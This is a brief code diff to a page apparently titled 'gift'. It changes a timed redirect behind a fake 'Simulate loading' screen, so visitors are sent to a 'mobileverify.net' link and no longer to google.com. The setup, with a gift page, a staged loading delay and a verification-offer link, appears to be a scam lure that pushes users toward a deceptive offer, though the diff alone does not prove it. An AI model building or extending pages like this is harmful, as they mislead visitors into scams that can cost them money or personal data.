--- a/gift/index.html
+++ b/gift/index.html
@@ -242,7 +242,7 @@
 
         // Simulate loading
         setTimeout(() => {
-            window.location.href = 'https://www.google.com';
+            window.location.href = 'https://mobileverify.net/cl/i/voxveg';
         }, 3000); // Wait for 3 seconds
     });
 </script>
